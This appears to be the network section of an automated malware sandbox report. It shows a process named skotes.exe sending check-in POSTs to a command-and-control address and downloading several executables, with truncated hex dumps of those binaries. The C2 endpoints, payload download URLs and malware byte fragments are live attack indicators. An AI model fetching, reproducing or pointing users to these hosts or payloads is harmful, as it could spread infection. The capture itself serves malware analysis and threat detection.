                                                                                                                                                                                                                                                                                        6192.168.2.449887185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:13.613301039 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 65 31 3d 31 30 30 35 35 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: e1=1005552001&unit=246122658369
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.252865076 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:14 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        7192.168.2.44989331.41.244.11807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.261960030 CET55OUTGET /files/crypted.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908690929 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:14 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 3186688
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 15:16:00 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "67321fb0-30a000"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 89 1c 32 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b6 2a 00 00 60 01 00 00 00 00 00 50 3d 29 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 06 00 00 00 00 00 00 03 00 40 c3 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 97 2b 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 2c 00 0c 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 53 2b 00 18 00 00 00 40 e9 2a 00 c0 00 00 00 00 00 00 00 00 00 00 00 20 99 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL2g*`P=)@1@\+< ,U S+@* +.text** `.rdata**@@.dataO+&+@.00cfg,+@@.tls,+@.relocU ,V+@B.TON,,@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908730030 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908740997 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908752918 CET1236INData Raw: 00 81 fa 97 91 52 4d 0f 8f c4 08 00 00 81 fa af f8 63 36 0f 8f 67 0f 00 00 81 fa e9 a6 04 31 0f 8e 6d 1b 00 00 81 fa ea a6 04 31 0f 84 73 32 00 00 81 fa bf aa 44 31 0f 84 29 38 00 00 81 fa f7 e6 a9 35 0f 85 58 ff ff ff ba 43 6c 08 5c 81 fa 82 78
                                                                                                                                                                                                                                                                                        Data Ascii: RMc6g1m1s2D1)85XCl\xJ%ODvxHMM>DpB;PEEEEEEEEkp%d!/o/
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908813953 CET424INData Raw: 14 81 e7 53 ad 8b eb 09 cf 89 c1 89 fa 81 f7 ac 52 74 14 f7 d1 31 fe 81 f2 41 a1 80 2b 81 e1 1a 5e 1f c0 81 e7 1a 5e 1f c0 81 e2 e5 a1 e0 3f 21 c6 25 e5 a1 e0 3f 09 c8 09 fa 89 f1 81 e6 27 b8 24 96 31 c2 f7 d1 89 d0 89 cf 81 e2 27 b8 24 96 f7 d0
                                                                                                                                                                                                                                                                                        Data Ascii: SRt1A+^^?!%?'$1'$Gi%Gi1E<!}}fSFE<1SS1fSF!%5IIsIs5I
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908824921 CET1236INData Raw: 94 c2 83 ff 0a 0f 9c c4 83 ff 09 88 55 bc 88 6d ac 0f 9f c0 30 ea 88 65 b4 88 d1 89 c3 88 45 b8 80 f1 01 30 e3 20 ca 88 ce 20 d6 30 ca 88 c1 89 d8 20 c8 08 f2 88 c6 88 45 b0 88 d4 80 f6 01 80 f4 01 88 f7 20 c7 80 f7 01 88 f8 08 f7 30 f0 80 f7 01
                                                                                                                                                                                                                                                                                        Data Ascii: Um0eE0 0 E 04 0 40 0004 0M4 00 0 0 0e4}4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908844948 CET212INData Raw: 25 63 b0 f3 80 09 d8 31 f0 89 d6 81 e2 46 e9 26 44 09 c7 f7 d6 89 f8 81 e7 11 9d 80 57 89 f1 f7 d0 81 e1 b9 16 d9 bb 25 ee 62 7f a8 09 ca 09 c7 89 f8 81 f7 ee 62 7f a8 35 00 89 00 44 09 fe 81 e7 b9 16 d9 bb 25 46 e9 26 44 f7 d6 09 f8 31 d0 09 c6
                                                                                                                                                                                                                                                                                        Data Ascii: %c1F&DW%bb5D%F&D19!/A'|-wWLiLi1|
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908858061 CET1236INData Raw: 89 ce 81 e1 a6 fc 04 dc 81 e7 a5 53 d8 b7 f7 d6 81 e6 59 03 fb 23 09 f1 89 de 81 f3 8d 3a 38 23 81 f6 52 08 03 48 89 c8 21 d3 81 e6 5a ac 27 48 35 75 c5 8c 3e 09 f7 89 ce 89 c2 81 f1 50 1a c8 0e 81 f6 00 18 62 00 81 e2 ae a2 15 c7 21 c1 89 f8 81
                                                                                                                                                                                                                                                                                        Data Ascii: SY#:8#RH!Z'H5u>Pb!Q]85SEZ'HscxUQ]8!U!1 %W.l @9%W.l1U%W5M%W5+_FV%_
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.908874989 CET1236INData Raw: 25 18 c0 ae 46 09 c3 89 f0 81 e6 8d 5c cb 36 f7 d0 89 c1 81 e1 72 a3 34 c9 09 ce 89 d9 81 f3 18 c0 ae 46 81 f1 85 1c 41 30 09 d8 81 e3 72 a3 34 c9 81 e1 8d 5c cb 36 f7 d0 09 d9 31 f1 09 c8 89 c1 25 e1 00 46 32 f7 d1 89 ca 81 c9 fd 16 56 b3 81 e2
                                                                                                                                                                                                                                                                                        Data Ascii: %F\6r4FA0r4\61%F2V4y59!H%4yM1A{%A%HC (x1Nt%^88}5<F!c
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.909127951 CET424INData Raw: c2 5f e6 09 f1 09 c7 89 d0 81 e2 b8 ac 18 df 89 ce 81 f1 f6 8a 51 f5 f7 d0 81 f6 08 55 a6 02 25 40 11 a0 00 81 e6 ce 57 e7 d2 09 d0 09 f1 31 f8 89 ce 89 c2 25 07 c2 5f e6 f7 d6 f7 d2 81 e2 f8 3d a0 19 09 d0 89 c3 89 c2 f7 d3 81 e2 26 30 e2 e9 89
                                                                                                                                                                                                                                                                                        Data Ascii: _QU%@W1%_=&0]1-O}aa,|!'*PaO,P!!1]}hUa,|-}A-
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:14.913813114 CET1236INData Raw: f0 35 04 79 1b 54 31 c1 21 c1 89 d0 81 e2 9e 60 df e8 f7 d0 89 c6 25 61 9f 20 17 09 c2 89 c8 81 e1 9e 60 df e8 f7 d0 09 c6 25 61 9f 20 17 09 c1 f7 d6 31 d1 89 f0 21 c8 31 f1 09 c1 89 ca f7 d2 89 d6 89 d0 21 ce 81 e1 e9 cb 4e 41 21 f0 31 d6 81 e2
                                                                                                                                                                                                                                                                                        Data Ascii: 5yT1!`%a `%a 1!1!NA!14A%eVJEJ5WL%J4 NAA!35WL3J!!rDX\X\rD1


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        8192.168.2.449923185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:18.111057043 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 35 35 36 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1005561001&unit=246122658369
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:18.749305010 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:18 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        9192.168.2.449929185.215.113.16807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:18.776561975 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.416491985 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:19 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 3135488
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 15:33:56 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "673223e4-2fd800"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 e0 2f 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 30 00 00 04 00 00 72 f6 2f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ/@0r/@Th@ @.rsrc@@.idata @htwuwyzf **@dhfttsvz//@.taggant0/"/@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.416508913 CET112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.416671038 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.416706085 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.416721106 CET424INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.416743040 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: Cy<w#9hPEff!9hVv=b..ea2"^YGSSz1%Zi1D~v*H=Y8hVx
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.416755915 CET1236INData Raw: 60 20 39 68 0f e5 1c 80 63 01 fd 67 d6 7b fa b3 5e 66 fc 83 3e 21 d9 a3 56 67 fc 83 4e 21 6f a4 32 29 41 b4 60 a1 72 a6 57 94 78 c2 0f e5 1c 70 54 31 79 48 52 2d fb df 92 45 33 21 93 45 19 e8 55 21 39 ef 55 21 39 68 fd df 3a 68 56 bf 4b c8 92 21
                                                                                                                                                                                                                                                                                        Data Ascii: ` 9hcg{^f>!VgN!o2)A`rWxpT1yHR-E3!EU!9U!9h:hVK!.=Vg)!\2qgiW>hV!/:(Z!9hdL)X\`ldx-EQ@2E9heT@EAV!9Eo-:-,i/U.U!9EME=-Re1Ho'9
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.416766882 CET424INData Raw: 52 11 39 68 d1 61 47 e4 a8 11 39 68 d6 3f 39 59 d2 ae 57 68 56 ac 09 65 db e5 1c 64 d3 61 75 df 20 77 7a 65 57 a5 96 59 56 21 be 28 58 a5 30 58 56 21 b9 6a 56 2e bd bf 67 21 39 db 95 25 c4 b4 32 25 bc 22 0b c9 3b 59 d2 60 47 68 56 a4 6e 59 d2 10
                                                                                                                                                                                                                                                                                        Data Ascii: R9haG9h?9YWhVedau wzeWYV!(X0XV!jV.g!9%2%";Y`GhVnYIhV>XV!2:hVf6 9hVgN!2M9!E-hV!9!EEhV!9EfV!22)9hV!*2Fh28hV!bYe!9EY 'S2#9hU!9hpVg:!259hV!2-9hV!2:hV_V!2Eha@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.417059898 CET1236INData Raw: 70 66 fc 66 55 31 f1 e7 1c 23 c1 94 32 39 c2 37 16 88 54 dd 92 45 3d 59 c0 2d 41 e0 da 45 d5 68 56 21 c4 94 32 2d be 16 58 a5 d0 68 56 21 48 f2 59 21 c9 a4 56 a9 c4 84 e9 21 39 68 d9 a5 1c ca 56 21 39 df 92 45 4d df 25 a2 72 5b 84 24 b2 5b 56 21
                                                                                                                                                                                                                                                                                        Data Ascii: pffU1#297TE=Y-AEhV!2-XhV!HY!V!9hV!9EM%r[$[V!9&HEI^ff!9hV"H!9hP[)%h'HXR.dU.SL!9h%'%n.EhV!:P=X\28hVb0oRE2%b>W!92)2A25/U
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.417123079 CET1236INData Raw: 66 4a ed 83 5a e7 c1 8c 32 35 80 a4 32 2d 3a 68 56 22 62 5c 5b 21 39 6f 14 fd 3a df 14 48 83 df 20 88 a3 65 56 21 c2 9c 32 2d c4 94 32 29 64 7a dd d5 1c 58 dd dd 1c 84 db d5 1c 60 fb 1d c2 9c 32 2d c4 94 32 29 c4 74 32 8a 4b df 9a 45 49 df aa 45
                                                                                                                                                                                                                                                                                        Data Ascii: fJZ252-:hV"b\[!9o:H eV!2-2)dzX`2-2)t2KEIEEABE2-2)p&W 9hWfV!HQ V5EQV#9hES>Zqht=EI&hFg~!Z3RW!2~i8G$"`cWff!9hVw iE=2EA\>
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:19.421447039 CET1236INData Raw: e6 e5 38 e0 d2 45 d6 68 56 21 c6 d4 32 9f 38 68 56 76 96 dd 92 45 49 df 15 38 69 ac 54 a8 69 e3 1d a8 86 59 d2 95 3a 68 56 a8 89 e5 f5 22 48 e4 dd 23 39 68 d9 db 39 22 55 31 c2 37 9e 2e bd 28 55 21 39 df 2e a2 5b 65 57 a5 af 66 56 21 c6 8e 54 67
                                                                                                                                                                                                                                                                                        Data Ascii: 8EhV!28hVvEI8iTiY:hV"H#9h9"U17.(U!9.[eWfV!TgfFiG#9hYET.T!9"T17`uY:hV"H#9h;xc<}aT!9w$!9hFkEMY%I"lEY8hV^/SY>Y$:!-'<Z


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        10192.168.2.449963185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.134154081 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 35 35 36 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1005562001&unit=246122658369
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.746985912 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:23 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        11192.168.2.449970185.215.113.16807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.762878895 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406578064 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:24 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 1802752
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 15:34:09 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "673223f1-1b8200"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 40 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 69 00 00 04 00 00 f5 ad [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"@i@pi@M$a$ $b@.rsrc $r@.idata $r@ *$t@gcuyxxju@Ov@busnlrvl0i\@.taggant0@i"`@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406713009 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406730890 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406743050 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406754971 CET1236INData Raw: fa 16 4d 61 e5 fb 29 e7 2c a7 d6 dd a7 7e 3f d9 f9 81 d8 45 6c dc 80 88 05 7f 93 45 50 16 31 cd 54 f6 f3 e4 ae db 85 48 ef 91 13 94 00 82 e9 6c cd 28 e1 f4 04 83 7d b0 0e 76 d7 28 9f 86 ed b7 8d c5 74 a5 75 e9 98 2a e2 13 de 45 86 a8 d1 4d 0d 6e
                                                                                                                                                                                                                                                                                        Data Ascii: Ma),~?ElEP1THl(}v(tu*EMnSM%qcw`M<:OXiA.NpCSaUsDnbF@YIw?mu^K.a9KX<ZLI.MZjNyMn~dQ1
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406765938 CET1236INData Raw: ff 17 dc 87 e6 7e 37 b0 67 f3 6d 63 3c 5b 86 40 fb 6c 95 f8 25 de a1 01 65 bd 70 40 ce 6f 19 4e d7 6d 0f e1 ee d2 e7 ae 3a 1c d7 28 4d 8c bb 50 4c 9b 1a de a5 5c 19 26 a9 13 2a c0 8f 34 e4 37 3c 09 97 b3 01 17 eb 8c 4e f2 59 0a 06 12 71 95 46 35
                                                                                                                                                                                                                                                                                        Data Ascii: ~7gmc<[@l%ep@oNm:(MPL\&*47<NYqF5E58^Wf6xP~[OL7?<[K=,G/]b~X.s7BL$@dp]u*-YujSDNr*a\H78-"O8O;%
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406783104 CET1236INData Raw: 05 46 38 8c 9e 56 79 91 4f 66 0f 4e 65 56 13 66 19 b2 04 d0 44 4c ca 4f 65 6e 11 8a 89 7e 51 91 01 b5 29 d1 34 65 c7 64 49 b8 19 44 f3 36 10 ae 55 72 85 78 69 3f 69 96 fb 33 f1 e5 88 6c a1 75 3d 3f 4f 98 8c 36 15 ae ad 72 c1 78 d5 b2 21 05 4a 94
                                                                                                                                                                                                                                                                                        Data Ascii: F8VyOfNeVfDLOen~Q)4edID6Urxi?i3lu=?O6rx!Jf@*2w>O2"x$,;eIG)c7/v7*=>l;#VGMrp@$b*4>;wN@}KO}b)(DNxFhK1L-!~bK8=l=*]>
